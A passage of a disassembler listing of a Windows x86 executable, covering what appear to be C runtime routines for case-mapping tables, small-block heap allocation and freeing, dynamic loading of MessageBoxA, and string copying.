loc_403CAF: ; CODE XREF: sub_403B86+117�j
and byte_407140[eax], 0
loc_403CB6: ; CODE XREF: sub_403B86+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403C7C
jmp short loc_403D08
; ---------------------------------------------------------------------------
loc_403CBF: ; CODE XREF: sub_403B86+1D�j
xor eax, eax
mov esi, 100h
loc_403CC6: ; CODE XREF: sub_403B86+180�j
cmp eax, 41h
jb short loc_403CE4
cmp eax, 5Ah
ja short loc_403CE4
or byte_407241[eax], 10h
mov cl, al
add cl, 20h
loc_403CDC: ; CODE XREF: sub_403B86+174�j
mov byte_407140[eax], cl
jmp short loc_403D03
; ---------------------------------------------------------------------------
loc_403CE4: ; CODE XREF: sub_403B86+143�j
; sub_403B86+148�j
cmp eax, 61h
jb short loc_403CFC
cmp eax, 7Ah
ja short loc_403CFC
or byte_407241[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403CDC
; ---------------------------------------------------------------------------
loc_403CFC: ; CODE XREF: sub_403B86+161�j
; sub_403B86+166�j
and byte_407140[eax], 0
loc_403D03: ; CODE XREF: sub_403B86+15C�j
inc eax
cmp eax, esi
jb short loc_403CC6
loc_403D08: ; CODE XREF: sub_403B86+137�j
pop esi
leave
retn
sub_403B86 endp
; =============== S U B R O U T I N E =======================================
sub_403D0B proc near ; CODE XREF: sub_402DE7+9�p
; sub_402E3F+D�p ...
cmp dword_407468, 0
jnz short locret_403D26
push 0FFFFFFFDh
call sub_403947
pop ecx
mov dword_407468, 1
locret_403D26: ; CODE XREF: sub_403D0B+7�j
retn
sub_403D0B endp
; =============== S U B R O U T I N E =======================================
sub_403D27 proc near ; CODE XREF: sub_402E3F+9D�p
; sub_403145+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403D54
push esi
call sub_403E08
pop ecx
test eax, eax
push esi
jz short loc_403D46
push eax
call sub_403E33
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403D46: ; CODE XREF: sub_403D27+13�j
push 0
push dword_407348
call dword_405084 ; RtlFreeHeap
loc_403D54: ; CODE XREF: sub_403D27+7�j
pop esi
retn
sub_403D27 endp
; =============== S U B R O U T I N E =======================================
sub_403D56 proc near ; CODE XREF: sub_402E3F+3A�p
; sub_402E3F+6F�p ...
arg_0 = dword ptr 4
push dword_4070F0
push [esp+4+arg_0]
call sub_403D68
pop ecx
pop ecx
retn
sub_403D56 endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403D56+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403D91
loc_403D6F: ; CODE XREF: sub_403D68+27�j
push [esp+arg_0]
call sub_403D94
test eax, eax
pop ecx
jnz short locret_403D93
cmp [esp+arg_4], eax
jz short locret_403D93
push [esp+arg_0]
call sub_4049ED
test eax, eax
pop ecx
jnz short loc_403D6F
loc_403D91: ; CODE XREF: sub_403D68+5�j
xor eax, eax
locret_403D93: ; CODE XREF: sub_403D68+13�j
; sub_403D68+19�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
sub_403D94 proc near ; CODE XREF: sub_403D68+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_406F38
ja short loc_403DAC
push esi
call sub_40415E
test eax, eax
pop ecx
jnz short loc_403DC8
loc_403DAC: ; CODE XREF: sub_403D94+B�j
test esi, esi
jnz short loc_403DB3
push 1
pop esi
loc_403DB3: ; CODE XREF: sub_403D94+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_407348
call dword_405060 ; RtlAllocateHeap
loc_403DC8: ; CODE XREF: sub_403D94+16�j
pop esi
retn
sub_403D94 endp
; =============== S U B R O U T I N E =======================================
sub_403DCA proc near ; CODE XREF: sub_403422+20�p
push 140h
push 0
push dword_407348
call dword_405060 ; RtlAllocateHeap
test eax, eax
mov dword_40710C, eax
jnz short loc_403DE7
retn
; ---------------------------------------------------------------------------
loc_403DE7: ; CODE XREF: sub_403DCA+1A�j
and dword_407104, 0
and dword_407108, 0
push 1
mov dword_407100, eax
mov dword_4070F8, 10h
pop eax
retn
sub_403DCA endp
; =============== S U B R O U T I N E =======================================
sub_403E08 proc near ; CODE XREF: sub_403D27+A�p
arg_0 = dword ptr 4
mov eax, dword_407108
lea ecx, [eax+eax*4]
mov eax, dword_40710C
lea ecx, [eax+ecx*4]
loc_403E18: ; CODE XREF: sub_403E08+26�j
cmp eax, ecx
jnb short loc_403E30
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403E32
add eax, 14h
jmp short loc_403E18
; ---------------------------------------------------------------------------
loc_403E30: ; CODE XREF: sub_403E08+12�j
xor eax, eax
locret_403E32: ; CODE XREF: sub_403E08+21�j
retn
sub_403E08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E33 proc near ; CODE XREF: sub_403D27+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403EF9
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403E8B
mov [ebp+arg_4], edi
loc_403E8B: ; CODE XREF: sub_403E33+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403EDD
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403EB9
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403EDD
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403EDD
; ---------------------------------------------------------------------------
loc_403EB9: ; CODE XREF: sub_403E33+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403EDD
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403EDD: ; CODE XREF: sub_403E33+60�j
; sub_403E33+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403EF9: ; CODE XREF: sub_403E33+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403F07
push 3Fh
pop edi
loc_403F07: ; CODE XREF: sub_403E33+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403FB6
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403F32
mov [ebp+arg_4], edx
mov ecx, edx
loc_403F32: ; CODE XREF: sub_403E33+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403F44
mov edi, edx
loc_403F44: ; CODE XREF: sub_403E33+10D�j
cmp ecx, edi
jz short loc_403FB3
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403F9B
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403F77
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403F9B
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403F9B
; ---------------------------------------------------------------------------
loc_403F77: ; CODE XREF: sub_403E33+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403F9B
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403F9B: ; CODE XREF: sub_403E33+11E�j
; sub_403E33+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403FB3: ; CODE XREF: sub_403E33+113�j
mov edx, [ebp+var_8]
loc_403FB6: ; CODE XREF: sub_403E33+DD�j
cmp [ebp+var_14], 0
jnz short loc_403FC5
cmp [ebp+arg_4], edi
jz loc_40404E
loc_403FC5: ; CODE XREF: sub_403E33+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40404E
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404022
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404011
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404011: ; CODE XREF: sub_403E33+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_40404B
; ---------------------------------------------------------------------------
loc_404022: ; CODE XREF: sub_403E33+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404038
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404038: ; CODE XREF: sub_403E33+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_40404B: ; CODE XREF: sub_403E33+1ED�j
mov ebx, [ebp+var_C]
loc_40404E: ; CODE XREF: sub_403E33+18C�j
; sub_403E33+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_404159
mov eax, dword_407104
test eax, eax
jz loc_40414B
mov ecx, dword_4070FC
mov edi, dword_405088
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; dword_405088
mov ecx, dword_4070FC
mov eax, dword_407104
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_407104
mov ecx, dword_4070FC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_407104
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_407104
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4040D9
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_407104
loc_4040D9: ; CODE XREF: sub_403E33+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_40414B
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; dword_405088
mov eax, dword_407104
push dword ptr [eax+10h]
push 0
push dword_407348
call dword_405084 ; RtlFreeHeap
mov eax, dword_407108
mov edx, dword_40710C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_407104
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404A10
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_407108
cmp eax, dword_407104
jbe short loc_40413D
sub eax, 14h
loc_40413D: ; CODE XREF: sub_403E33+305�j
mov ecx, dword_40710C
mov dword_407100, ecx
jmp short loc_40414E
; ---------------------------------------------------------------------------
loc_40414B: ; CODE XREF: sub_403E33+233�j
; sub_403E33+2AA�j
mov eax, [ebp+arg_0]
loc_40414E: ; CODE XREF: sub_403E33+316�j
mov dword_407104, eax
mov dword_4070FC, esi
loc_404159: ; CODE XREF: sub_403E33+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40415E proc near ; CODE XREF: sub_403D94+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_407108
mov edx, dword_40710C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_40419E
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4041AE
; ---------------------------------------------------------------------------
loc_40419E: ; CODE XREF: sub_40415E+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4041AE: ; CODE XREF: sub_40415E+3E�j
mov eax, dword_407100
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_4041D5
loc_4041BC: ; CODE XREF: sub_40415E+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4041D5
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_4041BC
loc_4041D5: ; CODE XREF: sub_40415E+5C�j
; sub_40415E+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_404253
mov ebx, edx
loc_4041DC: ; CODE XREF: sub_40415E+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4041F8
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4041F6
add ebx, 14h
jmp short loc_4041DC
; ---------------------------------------------------------------------------
loc_4041F6: ; CODE XREF: sub_40415E+91�j
cmp ebx, eax
loc_4041F8: ; CODE XREF: sub_40415E+83�j
jnz short loc_404253
loc_4041FA: ; CODE XREF: sub_40415E+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404210
cmp dword ptr [ebx+8], 0
jnz short loc_40420D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_4041FA
; ---------------------------------------------------------------------------
loc_40420D: ; CODE XREF: sub_40415E+A5�j
cmp ebx, [ebp+var_4]
loc_404210: ; CODE XREF: sub_40415E+9F�j
jnz short loc_404238
mov ebx, edx
loc_404214: ; CODE XREF: sub_40415E+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404228
cmp dword ptr [ebx+8], 0
jnz short loc_404226
add ebx, 14h
jmp short loc_404214
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_40415E+C1�j
cmp ebx, eax
loc_404228: ; CODE XREF: sub_40415E+BB�j
jnz short loc_404238
call sub_404467
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_40424C
loc_404238: ; CODE XREF: sub_40415E:loc_404210�j
; sub_40415E:loc_404228�j
push ebx
call sub_404518
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_404253
loc_40424C: ; CODE XREF: sub_40415E+D8�j
xor eax, eax
jmp loc_404462
; ---------------------------------------------------------------------------
loc_404253: ; CODE XREF: sub_40415E+7A�j
; sub_40415E:loc_4041F8�j ...
mov dword_407100, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_40427A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4042B1
loc_40427A: ; CODE XREF: sub_40415E+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4042AE
loc_404297: ; CODE XREF: sub_40415E+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_404297
loc_4042AE: ; CODE XREF: sub_40415E+137�j
mov edx, [ebp+var_4]
loc_4042B1: ; CODE XREF: sub_40415E+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_4042DA
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_4042DA: ; CODE XREF: sub_40415E+16D�j
; sub_40415E+183�j
test ecx, ecx
jl short loc_4042E3
shl ecx, 1
inc edi
jmp short loc_4042DA
; ---------------------------------------------------------------------------
loc_4042E3: ; CODE XREF: sub_40415E+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404300
push 3Fh
pop esi
loc_404300: ; CODE XREF: sub_40415E+19D�j
cmp esi, edi
jz loc_404415
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404371
cmp edi, 20h
jge short loc_404340
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_40436E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_404371
; ---------------------------------------------------------------------------
loc_404340: ; CODE XREF: sub_40415E+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_40436E
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_404371
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40415E+1D6�j
; sub_40415E+203�j
mov ebx, [ebp+arg_0]
loc_404371: ; CODE XREF: sub_40415E+1B0�j
; sub_40415E+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404421
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404412
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_4043E3
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4043D1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4043D1: ; CODE XREF: sub_40415E+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404412
; ---------------------------------------------------------------------------
loc_4043E3: ; CODE XREF: sub_40415E+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4043FC
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4043FC: ; CODE XREF: sub_40415E+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404412: ; CODE XREF: sub_40415E+24E�j
; sub_40415E+283�j
mov ecx, [ebp+var_8]
loc_404415: ; CODE XREF: sub_40415E+1A4�j
test ecx, ecx
jz short loc_404424
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404424
; ---------------------------------------------------------------------------
loc_404421: ; CODE XREF: sub_40415E+229�j
mov ecx, [ebp+var_8]
loc_404424: ; CODE XREF: sub_40415E+2B9�j
; sub_40415E+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_40445A
cmp ebx, dword_407104
jnz short loc_40445A
mov ecx, [ebp+var_4]
cmp ecx, dword_4070FC
jnz short loc_40445A
and dword_407104, 0
loc_40445A: ; CODE XREF: sub_40415E+2E0�j
; sub_40415E+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_404462: ; CODE XREF: sub_40415E+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40415E endp
; =============== S U B R O U T I N E =======================================
sub_404467 proc near ; CODE XREF: sub_40415E+CC�p
mov eax, dword_407108
mov ecx, dword_4070F8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4044AA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_40710C
push edi
push dword_407348
call dword_405058 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_4044FA
add dword_4070F8, 10h
mov dword_40710C, eax
mov eax, dword_407108
loc_4044AA: ; CODE XREF: sub_404467+11�j
mov ecx, dword_40710C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_407348
lea esi, [ecx+eax*4]
call dword_405060 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_4044FA
push 4
push 2000h
push 100000h
push edi
call dword_40505C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4044FE
push dword ptr [esi+10h]
push edi
push dword_407348
call dword_405084 ; RtlFreeHeap
loc_4044FA: ; CODE XREF: sub_404467+30�j
; sub_404467+67�j
xor eax, eax
jmp short loc_404515
; ---------------------------------------------------------------------------
loc_4044FE: ; CODE XREF: sub_404467+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_407108
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404515: ; CODE XREF: sub_404467+95�j
pop edi
pop esi
retn
sub_404467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404518 proc near ; CODE XREF: sub_40415E+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40452A: ; CODE XREF: sub_404518+19�j
test eax, eax
jl short loc_404533
shl eax, 1
inc ebx
jmp short loc_40452A
; ---------------------------------------------------------------------------
loc_404533: ; CODE XREF: sub_404518+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404548: ; CODE XREF: sub_404518+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404548
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_40505C ; VirtualAlloc
test eax, eax
jnz short loc_40457B
or eax, 0FFFFFFFFh
jmp loc_40460E
; ---------------------------------------------------------------------------
loc_40457B: ; CODE XREF: sub_404518+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_4045C1
lea eax, [edi+10h]
loc_404588: ; CODE XREF: sub_404518+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_404588
loc_4045C1: ; CODE XREF: sub_404518+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4045FE
or [eax+4], edi
loc_4045FE: ; CODE XREF: sub_404518+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40460E: ; CODE XREF: sub_404518+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404518 endp
; =============== S U B R O U T I N E =======================================
sub_404613 proc near ; CODE XREF: sub_403669+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4070C0, ebx
push esi
push edi
jnz short loc_404662
push offset aUser32_dll ; "user32.dll"
call dword_405014 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404698
mov esi, dword_405054
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_405054
test eax, eax
mov dword_4070C0, eax
jz short loc_404698
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_405054
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4070C4, eax
call esi ; dword_405054
mov dword_4070C8, eax
loc_404662: ; CODE XREF: sub_404613+B�j
mov eax, dword_4070C4
test eax, eax
jz short loc_404681
call eax ; dword_4070C4
mov ebx, eax
test ebx, ebx
jz short loc_404681
mov eax, dword_4070C8
test eax, eax
jz short loc_404681
push ebx
call eax ; dword_4070C8
mov ebx, eax
loc_404681: ; CODE XREF: sub_404613+56�j
; sub_404613+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4070C0 ; MessageBoxA
loc_404694: ; CODE XREF: sub_404613+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404698: ; CODE XREF: sub_404613+1C�j
; sub_404613+33�j
xor eax, eax
jmp short loc_404694
sub_404613 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046A0 proc near ; CODE XREF: sub_403669+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404723
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4046C4
shr ecx, 2
jnz short loc_404731
jmp short loc_4046E5
; ---------------------------------------------------------------------------
loc_4046C4: ; CODE XREF: sub_4046A0+1B�j
; sub_4046A0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4046F2
test al, al
jz short loc_4046FA
test esi, 3
jnz short loc_4046C4
mov ebx, ecx
shr ecx, 2
jnz short loc_404731
loc_4046E0: ; CODE XREF: sub_4046A0+8F�j
and ebx, 3
jz short loc_4046F2
loc_4046E5: ; CODE XREF: sub_4046A0+22�j
; sub_4046A0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40471E
dec ebx
jnz short loc_4046E5
loc_4046F2: ; CODE XREF: sub_4046A0+2B�j
; sub_4046A0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4046FA: ; CODE XREF: sub_4046A0+2F�j
test edi, 3
jz short loc_404714
loc_404702: ; CODE XREF: sub_4046A0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_404796
test edi, 3
jnz short loc_404702
loc_404714: ; CODE XREF: sub_4046A0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_404787
loc_40471B: ; CODE XREF: sub_4046A0+7F�j
; sub_4046A0+F4�j
mov [edi], al
inc edi
loc_40471E: ; CODE XREF: sub_4046A0+4D�j
dec ebx
jnz short loc_40471B
pop ebx
pop esi
loc_404723: ; CODE XREF: sub_4046A0+7�j
mov eax, [esp+4+arg_0]
